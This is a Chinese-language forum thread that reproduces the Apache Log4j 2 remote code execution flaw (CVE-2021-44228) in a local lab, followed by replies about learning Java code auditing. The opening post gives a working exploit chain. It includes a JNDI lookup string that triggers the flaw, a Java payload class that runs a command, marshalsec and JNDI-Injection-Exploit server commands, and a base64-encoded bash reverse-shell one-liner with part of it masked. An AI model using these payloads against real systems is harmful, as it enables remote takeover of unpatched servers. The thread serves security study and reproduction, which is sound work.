CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞

Edith123 · 发表于 2022-1-22 18:15

影响范围

Apache Log4j 2.x < 2.15.0-rc2
本地复现https://github.com/tangxiaofeng7/apache-log4j-poclog4j.java内容

[Java] 纯文本查看 复制代码

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
 
 
public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);
 
    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:1389/Log4jRCE}");
 
    }
}

Log4jRCE.java

[Java] 纯文本查看 复制代码

public class Log4jRCE {
    static {
        try {
            String [] cmd={"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
 
}

注意，这里Log4jRCE.java不要放在项目里，我这里将Log4jRCE.class放到了D盘根目录，不然log4j.java运行时会读取到本地的Log4jRCE，就不是http远程下载了在D盘根目录

[Asm] 纯文本查看 复制代码

python -m http.server 8888

然后执行

[Asm] 纯文本查看 复制代码

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

远程RCE docker拉个镜像

[Asm] 纯文本查看 复制代码

docker pull vulfocus/log4j2-rce-2021-12-09:latest
docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

先用网上公开的exp探测一下(此处为了引起不要的麻烦打码，你懂的)

反弹shell需要用到JNDI-Injection-Exploit启动⼀个rmi和ldap服务器，15c1貌似给ldap禁了但是rmi可以用，所以有了15c2

[Asm] 纯文本查看 复制代码

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxxxxxxxxxxxxxxxxuNzYuNDkvODQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 127.0.0.1

burp发包即可

漏洞检测工具推荐长亭科技免费推出的工具https://log4j2-detector.chaitin.cn

Edith123 · 发表于 2022-1-25 22:58

本帖最后由 Edith123 于 2022-1-25 23:18 编辑

youyouhuaqiao 发表于 2022-1-24 16:33
如何学习漏洞发掘和复现能力？

本菜鸡做Web安全的
转一个大佬的路线：
(1)先把java基础学—下重点file类型类的各种机制比如继承多态等。
(2)了解一下中间件如tomcat，spring,springboot等环境搭建以及开发的基础知识
(3)了解一些基础漏洞的代码xss注入文件上传等
我的审计路线是
(1)先把java基础学—下重点file类型类的各种机制比如继承多态等。ag22 8182(2)了解一下中间件如tomcat，spring,springboot等环境搭建以及开发的基础知识(3)了解一些基础漏洞的代码xss注入文件上传等
(4)审计一些老的cms不涉及mvc的,主要是可以熟悉漏洞，一般13 14 15年的比较多
(5）能审计不涉及mvc的之后，了解一下mvc，审计mvc的cms ，主要还是练手
(6）普通漏洞能审计之后开始复现分析一些框架漏洞组件漏洞然后深入看看反序列化漏洞
(7)了解框架的实现原理，主要是各个部分至少知道一个大概
(8)内存马回显这一块多看看会
(9)学一点java稍微深入一点的jvm等等。
(7)了解框架的实现原理，主要是各个部分至少知道一个大概
(8)内存马回显这一块多看看会
(9)学一点java稍微深入一点的jvm等等。

每个人学习方法不一样，主要是静下心来亲自动手

isPasser · 发表于 2022-1-24 17:52

这个让多少开发加班

jxji · 发表于 2022-1-24 17:53

JNDI-Injection-Exploit 自己也有反序列化漏洞，有可能被反打

casey502 · 发表于 2022-1-25 14:54

可以，但是如果能控制端口应该更好

Hao轩 · 发表于 2022-1-25 15:16

学习到新姿势了！！

Edith123 · 发表于 2022-1-25 22:59

jxji 发表于 2022-1-24 17:53
JNDI-Injection-Exploit 自己也有反序列化漏洞，有可能被反打

哈哈哈哈

Edith123 · 发表于 2022-1-25 23:14

isPasser 发表于 2022-1-24 17:52
这个让多少开发加班

安全也要加班，2021史诗级漏洞

帐号		自动登录	找回密码
密码			注册[Register]

[漏洞分析] CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞

免费评分